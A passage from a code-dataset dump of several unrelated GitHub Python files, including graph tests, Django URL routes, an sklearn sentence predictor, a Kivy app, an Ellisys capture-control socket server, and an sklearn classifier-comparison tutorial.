= Node('test1')\n self.g.add_node(n)\n self.assertEqual(self.g._number_of_nodes(), 1)\n\n def test_number_of_nodes(self):\n self.g = Graph()\n n = Node('test1')\n self.g.add_node(n)\n n = Node('test2')\n self.g.add_node(n)\n n = Node('test3')\n self.g.add_node(n)\n self.assertEqual(self.g._number_of_nodes(), 3)\n\n def test_nodes_fn(self):\n self.g = Graph()\n names = ['test1', 'test2', 'test3']\n nodes = set()\n for name in names:\n no = Node(name)\n self.g.add_node(no)\n nodes.add(no)\n self.assertTrue(nodes == set(self.g.nodes().keys()))\n\n def test_node_by_name(self):\n self.g = Graph()\n n = Node('test1')\n self.g.add_node(n)\n n = Node('test2')\n self.g.add_node(n)\n n = Node('test3')\n self.g.add_node(n)\n n = self.g._node_by_name('test2')\n self.assertEqual(n.name, 'test2')\n\n def test_node_edges_have_edges(self):\n self.g = Graph()\n a = Node('A')\n edge_nodes = ['B', 'C', 'D']\n s = set()\n for edge_node in edge_nodes:\n s.add(edge_node)\n n = Node(edge_node)\n a.add_edge(n)\n\n self.assertTrue(s == set([e.name for e in a.edges()]))\n\n def test_remove_node(self):\n self.g = Graph()\n name = 'A'\n a = Node(name)\n self.g.add_node(a)\n self.g.remove_node(name)\n a = self.g._node_by_name(name)\n self.assertTrue(a == None)\n\n def test_graph_from_dict(self):\n edges = ['B', 'C', 'D']\n gdict = {}\n self.g = Graph()\n gdict['A'] = edges\n self.g.graph_from_dict(gdict)\n self.assertTrue('A' in [n.name for n in self.g._nodes])\n a = self.g._node_by_name('A')\n self.assertTrue(set(edges) == set([e.name for e in a.edges()]))\n\n def test_dijkstras(self):\n graph = {}\n graph['B'] = ['C']\n graph['C'] = ['D']\n graph['D'] = ['E']\n graph['E'] = ['F']\n graph['F'] = ['Z']\n\n graph['G'] = ['H']\n graph['H'] = ['I']\n graph['I'] = ['J']\n graph['J'] = ['K']\n graph['K'] = ['L']\n graph['L'] = ['M']\n graph['M'] = ['N']\n graph['N'] = ['Z']\n\n graph['O'] = ['P']\n graph['P'] = ['Q']\n graph['Q'] = ['R']\n graph['R'] = ['S']\n graph['S'] = ['T']\n graph['T'] = ['U']\n graph['U'] = ['V']\n graph['V'] = ['W']\n graph['W'] = ['X']\n graph['X'] = ['Y']\n graph['Y'] = ['Z']\n graph['Z'] = None\n\n graph['A'] = ['B', 'G', 'O']\n\n self.g = Graph()\n\n self.g.graph_from_dict(graph)\n\n self.paths = self.g.dijkstra('A', 'Z')\n correct = ['A', 'B', 'C', 'D', 'E', 'F', 'Z']\n #path = [p.name for p in self.paths[min(self.paths.keys())][0]]\n path = [p.name for p in self.paths]\n self.assertEqual(path, correct)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"iknowed/units-convert","sub_path":"testGraph.py","file_name":"testGraph.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72343326867","text":"'''\r\nCreated on May 22, 2016\r\n\r\n@author: Dayo\r\n'''\r\n\r\n\r\nfrom django.conf.urls import url, include\r\n\r\n\r\nfrom .views import *\r\nfrom .ajax import *\r\nfrom .helper import UploadedContactsDownloadView\r\n\r\nurlpatterns = [\r\n #url(r'^$', Index.as_view(), name='index'),\r\n url(r'^exit/$', exitdoor , name='backdoor'),\r\n url(r'^$', entrance, name='frontdoor'),\r\n url(r'^register/free-trial/$', register_free_trial, name='freetrial-signup'),\r\n url(r'^register/email-validate/$', ValidateEmail.as_view(), name='register-validate-email'),\r\n url(r'^gcrawler/$', crawler_entrance, name=\"gcrawler\"),\r\n url(r'^dashboard/$', DashboardView.as_view(), name='dashboard-view'),\r\n url(r'^ping-stat/', include([\r\n url(r'^system/$', get_system_stats, name='system-stat'),\r\n url(r'^qpc/$', get_qpc_stats, name='qpc-stat'),\r\n ])),\r\n url(r'^settings/', include([\r\n url(r'^users/$', kituser_settings, name='kituser-settings-list'),\r\n url(r'^user/(?P\\d+)/$', KITUserUpdateView.as_view(), name='kituser-detail'),\r\n url(r'^user/new/$', UserCreateView.as_view(), name='kituser-new'),\r\n url(r'^user/(?P\\d+)/delete/$', KITUserDeleteView.as_view(), name='kituser-delete'),\r\n \r\n #User Groups\r\n url(r'^user-groups/$', usergroup_settings, name='usergroup-list'),\r\n url(r'^user-group/(?P\\d+)/$', UserGroupUpdateView.as_view(), name='usergroup-detail'),\r\n url(r'^user-group/(?P\\d+)/delete/$', UserGroupDeleteView.as_view(), name='usergroup-delete'),\r\n url(r'^user-group/new/$', UserGroupCreateView.as_view(), name='usergroup-new'),\r\n #SMTP\r\n url(r'^smtps/$', smtp_settings, name='smtp-settings-list'),\r\n url(r'^smtp/(?P\\d+)/$', SMTPUpdateView.as_view(), name='smtp-detail'),\r\n url(r'^smtp/new/$', SMTPCreateView.as_view(), name='smtp-new'),\r\n url(r'^smtp/(?P\\d+)/delete/$', SMTPDeleteView.as_view(), name='smtp-delete'),\r\n url(r'^smtp/(?P\\d+)/check/$', CheckSMTPServerView.as_view(), name='smtp-check'),\r\n \r\n #Accounts\r\n url(r'^account/$', AccountManagementView.as_view(), name='account-mgmt'),\r\n url(r'^account/user/get-balance/$', get_user_balance),\r\n url(r'^account/user/transfer/$', UserBalanceTransferView.as_view(), name='user-balance-transfer'),\r\n url(r'^account/user/credit-transfer/$', user_credit_transfer, name='credit-transfer'),\r\n \r\n \r\n url(r'^account/user/send-verify-code/$', send_verification_code, name='send-verification-code'),\r\n url(r'^account/user/verify/$', verify_user_details, name='now-validate-user-details'),\r\n \r\n #my profile\r\n url(r'^user/me/$', KITUserPersonalProfileView.as_view(), name='kituser-personal-profile'),\r\n ])),\r\n #Data Management\r\n url(r'^data-mgmt/', include([\r\n url(r'import_contact/$', ContactImportView.as_view(), name='contact-import'),\r\n url(r'import_contact/upload/$', get_contact_file_upload, name='contact-upload-action'),\r\n url(r'import_contact/import/$', now_import_contacts, name='contact-import-action'),\r\n url(r'custom_data/$', CustomDataView.as_view(), name='custom-data'),\r\n url(r'export/$', now_import_contacts, name='export-data'),\r\n url('^contact/(?P[A-Za-z0-9_-]+)/download/$',UploadedContactsDownloadView.as_view(), name='download-contact-file'),\r\n ])),\r\n #custom Data\r\n url(r'^data-mgmt/', include([\r\n url(r'^custom-data/upload/$', upload_custom_data, name='upload-custom-data'),\r\n url(r'^custom-data/process-a/$', process_1_custom_data),\r\n url(r'^custom-data/(?P\\w{6})/$', get_custom_data_ajax, name='custom-data-ajax'),\r\n url(r'^custom-data/(?P\\w{6})/delete/$', delete_custom_data_ajax, name='delete-custom-data-ajax'),\r\n url(r'^custom-data/headers/(?P\\w{6})/$', get_custom_data_columns, name='custom-data-columns'),\r\n url(r'^custom-data/headers/$', get_custom_data_columns),\r\n ])),\r\n\r\n\r\n #User Groups\r\n url(r'^contact-lists/$', contactgroups, name='contactgroup-list'),\r\n url(r'^contact-list/', include([\r\n url(r'^new/$', ContactGroupCreateView.as_view(), name='contactgroup-new'),\r\n url(r'^(?P\\d+)/$', ContactGroupUpdateView.as_view(), name='contactgroup-detail'),\r\n url(r'^(?P\\d+)/delete/$', ContactGroupDeleteView.as_view(), name='contactgroup-delete'),\r\n ])),\r\n url(r'^contacts/$', contacts, name='contacts-list'), #lists all contacts\r\n url(r'^contact/', include([\r\n url(r'^(?P[A-Z0-9]{9})/$', ContactViewView.as_view(), name='contact-detail'),\r\n url(r'^(?P[A-Z0-9]{9})/delete/$', ContactDeleteView.as_view(), name='contact-delete'),\r\n url(r'^new/$', ContactCreateView.as_view(), name='contact-new')\r\n ])),\r\n url(r'^events/$', privateevents, name='events-list'), #lists all contacts\r\n url(r'^events/public/$', publicevents, name='public-events-list'), #lists all contacts\r\n url(r'^event/public/', include([\r\n url(r'^(?P\\d+)/$', PublicEventUpdateView.as_view(), name='public-event-detail'),\r\n url(r'^(?P\\d+)/delete/$', PublicEventDeleteView.as_view(), name='public-event-delete'),\r\n url(r'^new/$', PublicEventCreateView.as_view(), name='public-event-new')\r\n ])),\r\n url(r'^templates/$', templates, name='templates-list'),\r\n url(r'^template/', include([\r\n url(r'^(?P\\d+)/$', MessageTemplateUpdateView.as_view(), name='templates-detail'),\r\n url(r'^new/$', MessageTemplateCreateView.as_view(), name='template-new'),\r\n url(r'^(?P\\d+)/delete/$', MessageTemplateDeleteView.as_view(), name='template-delete')\r\n ])),\r\n url(r'template/(?P\\d+)/preview/', fetch_message_template_preview, name='template-preview'),\r\n]","repo_name":"dedayoa/keepintouch","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32592229540","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nimport build_corpus_and_ss_classifier\nfrom build_classifier_from_ss_corpus import load_silver_standard, max_score_from_csv\nfrom semisuper import transformers, helpers\n\n\nclass KeySentencePredictor(BaseEstimator, TransformerMixin):\n \"\"\"predicts positions and scores of relevant sentences for list of {\"pmid\" : , \"abstract\" : } dicts\"\"\"\n\n def __init__(self, batch_size=100):\n \"\"\"load pretrained classifier and maximum score in silver standard corpus for normalization\"\"\"\n\n self.max_batch_size = batch_size\n self.pipeline = build_corpus_and_ss_classifier.train_pipeline(from_scratch=False, mode=\"tolerant\")\n\n if not hasattr(self.pipeline, \"predict_proba\"):\n self.max_score = max_score_from_csv(load_silver_standard())\n else:\n self.max_score = 1.0\n\n def fit(self, X=None, y=None):\n return self\n\n def predict(self, X):\n \"\"\"return dict with all pmids in X as keys and lists of key sentence tuples as values\n\n same as transform\"\"\"\n\n return self.transform(X)\n\n def transform(self, X):\n \"\"\"return dict with all pmids in X as keys and lists of key sentence tuples as values\"\"\"\n return helpers.merge_dicts(map(self.transform_batch, helpers.partition(X, self.max_batch_size)))\n\n def transform_batch(self, X):\n \"\"\"predicts positions and scores of relevant sentences for list of {pmid, abstract} dictionaries\"\"\"\n\n sentences, pmids, positions = self.sentences_pmids_positions(X)\n\n scores = self.sentence_scores(sentences)\n\n return self.hit_dict_list(pmids, scores, positions)\n\n def hit_dict_list(self, pmids, scores, positions):\n \"\"\"build up result (dict of pmids and relevant sentences) from intermediate lists\"\"\"\n\n result_dict = {pmid: [] for pmid in pmids}\n\n for pmid, (start, end), score in zip(pmids, positions, scores):\n if score > 0:\n result_dict[pmid].append((start, end, score))\n\n return result_dict\n\n def sentences_pmids_positions(self, X):\n \"\"\"turn list of dicts into lists of individual sentences, corresponding pmids, and positions\n\n dicts must have keys pmid and abstract\"\"\"\n\n sentence_lists = [transformers.sentence_tokenize(x[\"abstract\"])\n for x in X]\n\n sentences = helpers.flatten(sentence_lists)\n positions = helpers.flatten(map(self.get_positions, sentence_lists))\n\n pmids = []\n for i in range(len(X)):\n pmids += [X[i][\"pmid\"]] * len(sentence_lists[i])\n\n return sentences, pmids, positions\n\n def sentence_scores(self, sentences):\n \"\"\"return normalized scores for list of sentences independently from classifier type\"\"\"\n\n if hasattr(self.pipeline, 'predict_proba'):\n scores = self.normalized_probas(sentences)\n elif hasattr(self.pipeline, 'decision_function'):\n scores = self.normalized_dec_fns(sentences)\n else:\n scores = self.pipeline.predict(sentences)\n return scores\n\n def normalized_dec_fns(self, sentences):\n \"\"\"map decision function values to relevance score in [-1,1] using maximum score in the corpus and a cutoff\"\"\"\n\n scores = self.pipeline.decision_function(sentences)\n return np.clip(np.array(scores) * 1.0 / self.max_score, -1.0, 1.0)\n\n def normalized_probas(self, sentences):\n \"\"\"map probabilities to relevance score in [0,1]\"\"\"\n\n probas = self.pipeline.decision_function(sentences)\n return (np.abs(probas[:, 1]) - 0.5) * 2\n\n @staticmethod\n def get_positions(sentences):\n \"\"\"return start and end position for each element in sentences\"\"\"\n\n end = -1\n positions = []\n\n for i in range(len(sentences)):\n start = end + 1\n end = start + len(sentences[i])\n positions.append((start, end))\n\n return positions\n","repo_name":"nachne/semisuper","sub_path":"key_sentence_predictor.py","file_name":"key_sentence_predictor.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33520066954","text":"import os\nfrom kivy.lang import Builder\nfrom kivy import platform\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screenmanager import MDScreenManager\n\nfrom app.frontend.mainscreen.mainscreen import MainScreen\nfrom app.frontend.netflixloadingscreen.netflixloadingscreen import NetflixLoadingScreen\nfrom app.frontend.netflixnewdatascreen.netflixnewdatascreen import NetflixNewDataScreen\nfrom app.frontend.netflixuserscreen.netflixuserscreen import NetflixUserScreen\nfrom app.frontend.spotifyloginscreen.spotifyloginscreen import SpotifyLoginScreen\nfrom app.frontend.spotifynewdatascreen.spotifynewdatascreen import SpotifyNewDataScreen\nfrom app.frontend.spotifyuserscreen.spotifyuserscreen import SpotifyUserScreen\nfrom app.frontend.spotifyloadingscreen.spotifyloadingscreen import SpotifyLoadingScreen\n\nBuilder.load_file(\"main.kv\")\nBuilder.load_file(\"app/frontend/mainscreen/mainscreen.kv\")\nBuilder.load_file(\"app/frontend/netflixloadingscreen/netflixloadingscreen.kv\")\nBuilder.load_file(\"app/frontend/netflixnewdatascreen/netflixnewdatascreen.kv\")\nBuilder.load_file(\"app/frontend/netflixuserscreen/netflixuserscreen.kv\")\nBuilder.load_file(\"app/frontend/spotifyloginscreen/spotifyloginscreen.kv\")\nBuilder.load_file(\"app/frontend/spotifynewdatascreen/spotifynewdatascreen.kv\")\nBuilder.load_file(\"app/frontend/spotifyuserscreen/spotifyuserscreen.kv\")\nBuilder.load_file(\"app/frontend/spotifyloadingscreen/spotifyloadingscreen.kv\")\n\nspotify_final_data = os.path.abspath(\"app/backend/spotify/database/new_data.csv\")\nnetflix_final_data = os.path.abspath(\"app/backend/netflix/database/final_data.csv\")\n\nif platform == \"android\":\n from android.permissions import request_permissions, Permission\n request_permissions([\n Permission.INTERNET,\n Permission.READ_MEDIA_IMAGES,\n Permission.READ_MEDIA_VIDEO,\n Permission.READ_MEDIA_AUDIO\n ])\n\n\nclass WindowManager(MDScreenManager):\n pass\n\n\nclass StatsApp(MDApp):\n def build(self):\n self.title = \"stats.io\"\n return WindowManager()\n\n def on_stop(self):\n with open(\n netflix_final_data, \"w\", newline=\"\"\n ) as csv_file:\n csv_file.truncate()\n with open(\n spotify_final_data, \"w\", newline=\"\"\n ) as csv_file:\n csv_file.truncate()\n\n\nif __name__ == \"__main__\":\n StatsApp().run()\n","repo_name":"stats-io/stats.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25596782247","text":"from Config import OrderGeneratorConfig\nfrom Factory.Interface import AbstractGenerator\nfrom Strategies.Implementation import *\nfrom Constants import *\n\n\nclass OrderHistoryGenerator(AbstractGenerator):\n def __init__(self, config: OrderGeneratorConfig):\n self._config = config\n self._order_id = OrderIDStrategy(self._config.initial_order_id)\n self._provider_id = ProviderIDStrategy(self._config.provider_id)\n self._direction = DirectionStrategy(self._config.direction)\n self._currency_pair = CurrencyPairStrategy(self._config.currency_pairs)\n self._volume_strategy = VolumeStrategy()\n self._description = DescriptionStrategy()\n self._tags = TagsStrategy(self._config.tags)\n self._extra_data = ExtraDataStrategy()\n self._orders_list = None\n\n def generate_objects(self):\n self._orders_list = []\n for zone in self._config.zones:\n _date = DateStrategy(\n initial_date=self._config.zones[zone][ZONE_INITIAL_DATE_KEY],\n end_date=self._config.zones[zone][ZONE_END_DATE_KEY],\n steps=self._config.total_orders * self._config.zones[zone][ZONE_PERCENT_OF_TOTAL_ORDERS_KEY])\n _status = StatusStrategy(population=self._config.zones[zone][ZONE_POSSIBLE_STATUSES_KEY],\n date_strategy=_date,\n currency_strategy=self._currency_pair, vol_strategy=self._volume_strategy)\n for _ in range(self._config.total_orders):\n self._orders_list.append(\n [\n self._order_id.next_entry(),\n self._provider_id.next_entry(),\n self._direction.next_entry(),\n self._tags.next_entry(),\n _date.next_entry(),\n _status.next_entry()\n ]\n )\n\n def get_orders_list(self):\n return self._orders_list\n","repo_name":"hulk105/order-generator","sub_path":"object-oriented/Factory/OrderHistoryGenerator.py","file_name":"OrderHistoryGenerator.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28319664802","text":"\n# coding: utf-8\n\n# In[182]:\n\nimport pyodbc\nimport numpy\nimport pandas\nimport sqlite3\nimport nltk\n\n\n# In[183]:\n\ndata = pandas.read_csv(\"/Users/mkamalakshan/Desktop/Apryl/Facebook.csv\",header=0, delimiter=\",\",encoding='latin-1')\n\n\n# In[184]:\n\nlist(data)\n\n\n# In[185]:\n\ndata = data [['Post','Link Clicks','Time']]\n\n\n# In[186]:\n\ndata.head()\n\n\n# In[191]:\n\ndef find_ngrams(input_list, n):\n return zip(*[input_list[i:] for i in range(n)])\n\n#input_list = ['all', 'this', 'happened', 'more', 'or', 'less']\n#print (list(find_ngrams(input_list, 1)))\n#print (list(find_ngrams(input_list, 2)))\n#print (list(find_ngrams(input_list, 3)))\n#print (list(find_ngrams(input_list, 4)))\n\n\n# In[192]:\n\ndata.shape[0]\n\n\n# In[193]:\n\nimport re\n\n\n# In[203]:\n\nposted1 =[]\nposted2 =[]\nposted3 =[]\nposted4 =[]\n\nfor i in range (0,data.shape[0]):\n post=((data['Post'][i]).lower())\n post = post.replace('...','')\n post = post.replace('_','')\n post = re.sub(';','',post)\n post = re.sub(',','',post)\n post = re.sub('\\d','X',post)\n post = re.sub('--','',post)\n post = post.split()\n posted1.append(list(find_ngrams(post, 1)))\n posted2.append(list(find_ngrams(post, 2)))\n posted3.append(list(find_ngrams(post, 3)))\n posted4.append(list(find_ngrams(post, 4)))\n\n \nprint(posted1[0])\nprint(posted2[0])\nprint(posted3[0])\nposted4[0]\n\n\n# In[220]:\n\ndf1 = pandas.DataFrame(posted1)\ndf2 = pandas.DataFrame(posted2)\ndf3 = pandas.DataFrame(posted3)\ndf4 = pandas.DataFrame(posted4)\n\n\n# In[221]:\n\nnewdata1=data.join(df1)\nnewdata2=data.join(df2)\nnewdata3=data.join(df3)\nnewdata4=data.join(df4)\n\n\n# In[238]:\n\nndata1= pandas.melt(newdata1, id_vars = ['Post', 'Link Clicks','Time'])\nndata2= pandas.melt(newdata2, id_vars = ['Post', 'Link Clicks','Time'])\nndata3= pandas.melt(newdata3, id_vars = ['Post', 'Link Clicks','Time'])\nndata4= pandas.melt(newdata4, id_vars = ['Post', 'Link Clicks','Time'])\n\n\n# In[239]:\n\nprint(ndata1.shape)\nprint(ndata2.shape)\nprint(ndata3.shape)\nprint(ndata4.shape)\n\n\n# In[240]:\n\nndata1 = ndata1[ndata1['value'].notnull()]\nndata2 = ndata2[ndata2['value'].notnull()]\nndata3 = ndata3[ndata3['value'].notnull()]\nndata4 = ndata4[ndata4['value'].notnull()]\n\n\n# In[241]:\n\nprint(ndata1.shape)\nprint(ndata2.shape)\nprint(ndata3.shape)\nprint(ndata4.shape)\n\n\n# In[251]:\n\nndata1['variable'] = 'unigram'\nndata1.head()\n\n\n# In[257]:\n\nndata2['variable'] = 'bigram'\nndata2.head()\n\n\n# In[258]:\n\nndata3['variable'] = 'trigram'\nndata3.head()\n\n\n# In[259]:\n\nndata4['variable']= 'fourgram'\nndata4.head()\n\n\n# In[263]:\n\nndata = pandas.concat([ndata1,ndata2],axis=0,ignore_index=True)\nndata = pandas.concat([ndata,ndata3],axis=0,ignore_index=True)\nndata = pandas.concat([ndata,ndata4],axis=0,ignore_index=True)\n\n\n# In[264]:\n\nndata.shape\n\n\n# In[266]:\n\nndata.to_csv(\"/Users/mkamalakshan/Desktop/Apryl/output.csv\", sep='\\t', encoding='utf-8')\n\n\n# In[ ]:\n\n\n\n","repo_name":"meenu-kamalakshan/Python","sub_path":"Rare Hl NLP .py","file_name":"Rare Hl NLP .py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1717730335","text":"#!/usr/bin/env python3\n\nimport socket\nimport os\nimport psutil\nimport messages\nimport config\nimport subprocess\nimport sys\nimport time\nfrom helper import write_logs\n\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((config.ELLISYS_HOST, config.ELLISYS_PORT))\n\n\n\n\n\ndef autoItRunAndWait(file):\n print('Running AutoIT file \"AutoIt3 au3Commands\\\\{0}\"'.format(file))\n p = subprocess.Popen('cmd /c \"AutoIt3 au3Commands\\\\{0}\"'.format(file), stdout = subprocess.PIPE)\n successfull = False\n try:\n p.wait(config.ELLYSIS_TIMEOUT_AFTER_COMMAND_RECEIVED)\n successfull = (p.returncode == 0)\n except subprocess.TimeoutExpired:\n p.kill()\n\n return successfull\n\n\ndef printCPUMemoryLogs():\n cpu = psutil.cpu_percent()\n ram = psutil.virtual_memory().percent\n\n currentTime = time.strftime(\"%d/%m/%y %H:%M:%S\", time.localtime())\n sysInfo = ' [' + currentTime + '] CPU usage: {}%, Memory usage: {}'.format(cpu, ram)\n print(sysInfo)\n write_logs(log_fname, sysInfo, \"a\")\n\ndef sendAck(client, payload):\n info = 'Sending ACK message with payload \"{0}\"'.format(payload)\n print(info)\n write_logs(log_fname, info + '\\n', 'a')\n message = str.encode(messages.NewACK(payload))\n client.sendall(message)\n\ndef sendFail(client, payload):\n info ='\"Sending a FAIL message with payload \"{0}\"'.format(payload)\n print(info)\n write_logs(log_fname, info + '\\n', 'a')\n message = str.encode(messages.NewFAIL(payload))\n client.sendall(message)\n\n\nlaunchTime = time.strftime(\"%d-%m-%y_%H-%M-%S\", time.localtime()) # for log file name\nlog_fname = \"ellisys_\" + launchTime\nwrite_logs(log_fname, \"--- Log init --- \\n\", 'w')\nlog = \"\"\n\nprint(\"Starting server...\")\nwhile True:\n s.listen(5)\n client, address = s.accept()\n print(\"New client: {}, waiting on command\".format( address ))\n\n # receive command\n response = client.recv(config.SOCKET_RECEIVE_BUFFER).decode('utf-8')\n\n # parse\n command, payload = messages.parse_msg(response)\n\n currentTime = time.strftime(\"%d/%m/%y %H:%M:%S\", time.localtime())\n info=' [' + currentTime + '] -> Received message \"{0}\", parsed as \"{1}\" args \"{2}\"'.format(response, command, payload)\n print(info)\n write_logs(log_fname, info + '\\n', 'a')\n\n\n if command == messages.CMD_OPEN_ELLISYS:\n successfull = autoItRunAndWait('open_ellisys.au3')\n if successfull:\n sendAck(client, \"Ellisys opened\")\n\n elif command == messages.CMD_CLOSE_ELLISYS:\n successfull = autoItRunAndWait('close_ellisys.au3')\n if successfull:\n sendAck(client, \"Ellisys closed\")\n\n # The file name is needed in order to AutoIt\n # to know which windws to activate (when saving a file the window name\n # changes as well)\n elif command == messages.CMD_START_CAPTURE:\n if payload != '':\n filename = payload\n successfull = autoItRunAndWait('start_capture.au3 {}'.format(filename))\n else:\n successfull = autoItRunAndWait('start_capture.au3')\n if successfull:\n sendAck(client, \"Capture started\")\n\n elif command == messages.CMD_STOP_CAPTURE:\n successfull = autoItRunAndWait('stop_capture.au3')\n if successfull:\n sendAck(client, \"Capture stopped\")\n\n elif command == messages.CMD_SAVE_CAPTURE:\n filename = payload\n successfull = autoItRunAndWait('save_capture.au3 {}'.format(filename))\n if successfull:\n sendAck(client, \"Capture \" +filename + \" saved\")\n else :\n sendFail(client, \"EllisysErrorSave\")\n continue\n\n else:\n sendFail(client, \"Command unknown.\")\n\n printCPUMemoryLogs()\n\n\n if not successfull:\n sendFail(client, \"AutoIt command time out: {}s reached \".format(config.ELLYSIS_TIMEOUT_AFTER_COMMAND_RECEIVED))\n print(\"Waiting for fix...\")\n\n\nprint(\"Server closed\")\nclient.close()\ns.close()\n","repo_name":"alex35469/Traffic-Analysis-on-wearables","sub_path":"Automation/ellisys_to_controler.py","file_name":"ellisys_to_controler.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8601192775","text":"\n# coding: utf-8\n\n# # Machine Learning : Toolbox, Interface, Use-Case\n# (Ref. St-18-0300).\n\n# Ce code est composé de deux parties : \n# * un exemple de scikit-learn provenant de la documentation officielle\n# * le TP\n# Votre travail sera évalué en lancant l'intégralité du script.\n# \n# Petits rappels : il faut commenter son code, mais pas trop ! ;) \n# \n# \n\n# ## Scikit Learn Package Example\n\n# Code extrait de :\n# http://scikit-learn.org/stable/auto_examples/classification/plot_classifier_comparison.html\n\n# In[1]:\n\n\nprint(__doc__)\n\n\n# Code source: Gaël Varoquaux\n# Andreas Müller\n# Modified for documentation by Jaques Grobler\n# License: BSD 3 clause\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_moons, make_circles, make_classification\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nh = .02 # step size in the mesh\n\nnames = [\"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\", \"Gaussian Process\",\n \"Decision Tree\", \"Random Forest\", \"Neural Net\", \"AdaBoost\",\n \"Naive Bayes\", \"QDA\"]\n\nclassifiers = [\n KNeighborsClassifier(3),\n SVC(kernel=\"linear\", C=0.025),\n SVC(gamma=2, C=1),\n GaussianProcessClassifier(1.0 * RBF(1.0)),\n DecisionTreeClassifier(max_depth=5),\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n MLPClassifier(alpha=1),\n AdaBoostClassifier(),\n GaussianNB(),\n QuadraticDiscriminantAnalysis()]\n\nX, y = make_classification(n_features=2, n_redundant=0, n_informative=2,\n random_state=1, n_clusters_per_class=1)\nrng = np.random.RandomState(2)\nX += 2 * rng.uniform(size=X.shape)\nlinearly_separable = (X, y)\n\ndatasets = [make_moons(noise=0.3, random_state=0),\n make_circles(noise=0.2, factor=0.5, random_state=1),\n linearly_separable\n ]\n\nfigure = plt.figure(figsize=(27, 9))\ni = 1\n# iterate over datasets\nfor ds_cnt, ds in enumerate(datasets):\n # preprocess dataset, split into training and test part\n X, y = ds\n X = StandardScaler().fit_transform(X)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.4, random_state=42)\n\n x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5\n y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n # just plot the dataset first\n cm = plt.cm.RdBu\n cm_bright = ListedColormap(['#FF0000', '#0000FF'])\n ax = plt.subplot(len(datasets), len(classifiers) + 1, i)\n if ds_cnt == 0:\n ax.set_title(\"Input data\")\n # Plot the training points\n ax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\n edgecolors='k')\n # and testing points\n ax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright, alpha=0.6,\n edgecolors='k')\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xticks(())\n ax.set_yticks(())\n i += 1\n\n # iterate over classifiers\n for name, clf in zip(names, classifiers):\n ax = plt.subplot(len(datasets), len(classifiers) + 1, i)\n clf.fit(X_train, y_train)\n score = clf.score(X_test, y_test)\n\n # Plot the decision boundary. For that, we will assign a color to each\n # point in the mesh [x_min, x_max]x[y_min, y_max].\n if hasattr(clf, \"decision_function\"):\n Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])\n else:\n Z = clf.predict_proba(np.c_[xx.ravel(), yy.ravel()])[:, 1]\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n ax.contourf(xx, yy, Z, cmap=cm, alpha=.8)\n\n # Plot also the training points\n ax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\n edgecolors='k')\n # and testing points\n ax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright,\n edgecolors='k', alpha=0.6)\n\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xticks(())\n ax.set_yticks(())\n if ds_cnt == 0:\n ax.set_title(name)\n ax.text(xx.max() - .3, yy.min() + .3, ('%.2f' % score).lstrip('0'),\n size=15, horizontalalignment='right')\n i += 1\n\nplt.tight_layout()\nplt.show()\n\n\n# ## TP\n# Il vous faudra faire les \"import\" des packages nécessaires à votre travail (en plus des \"import\" déjà effectués dans l'exemple).\n\n# ### étape 0 : import des packages :\n\n# In[2]:\n\n\n# import ...\n\n\n# ### étape 1.1 : importer les données\n# vous trouverez à l'adresse [data.pickle](https://github.com/jorisgu/tp_evaluation_python_edf/raw/master/data.pickle) le fichier pickle contenant un dictionnaire python contenant les variables nécessaires :\n# * X_train\n# * Y_train\n# * X_test\n# * Y_test\n# \n# Vous appliquerez l'entraînement des modèles sur les données d'entraînement et l'évaluation sur les données de test...\n# \n# Chaque ligne correspond à un exemple, X contenant les vecteurs représentatifs des données et Y les classes.\n\n# In[3]:\n\n\n# with ...\n# data = ...\n# X_train = 